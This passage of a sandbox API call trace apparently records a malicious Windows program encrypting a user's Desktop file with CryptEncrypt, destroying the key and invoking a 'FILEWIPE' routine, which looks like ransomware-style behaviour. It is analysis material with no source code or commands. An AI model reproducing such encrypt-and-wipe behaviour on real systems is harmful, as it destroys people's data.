(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.494] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.494] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.494] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.495] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.495] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.495] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.495] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.495] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8fe2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8ff0) returned 1 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.496] CharLowerBuffW (in: lpsz="byte[36849]", cchLength=0xb | out: lpsz="byte[36849]") returned 0xb [0029.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.496] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.496] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.496] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.496] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8caf90*, pdwDataLen=0x6ae220*=0x8fe2, dwBufLen=0x8ff0 | out: pbData=0x8caf90*, pdwDataLen=0x6ae220*=0x8ff0) returned 1 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.497] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.497] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.499] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.499] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.499] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.499] CryptDestroyKey (hKey=0x7c2200) returned 1 [0029.499] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.499] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.499] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.499] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.499] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.499] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.499] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.500] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.500] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.500] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.500] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.500] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.500] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.500] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.500] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.500] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0029.500] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.500] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.501] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.501] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.501] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.501] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.502] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.502] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.503] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.503] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.503] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x65c8b140, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0x7c2100 [0029.503] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.503] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.503] CharLowerBuffW (in: lpsz="byte[36834]", cchLength=0xb | out: lpsz="byte[36834]") returned 0xb [0029.504] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.504] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.504] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.504] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.504] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.504] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.505] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 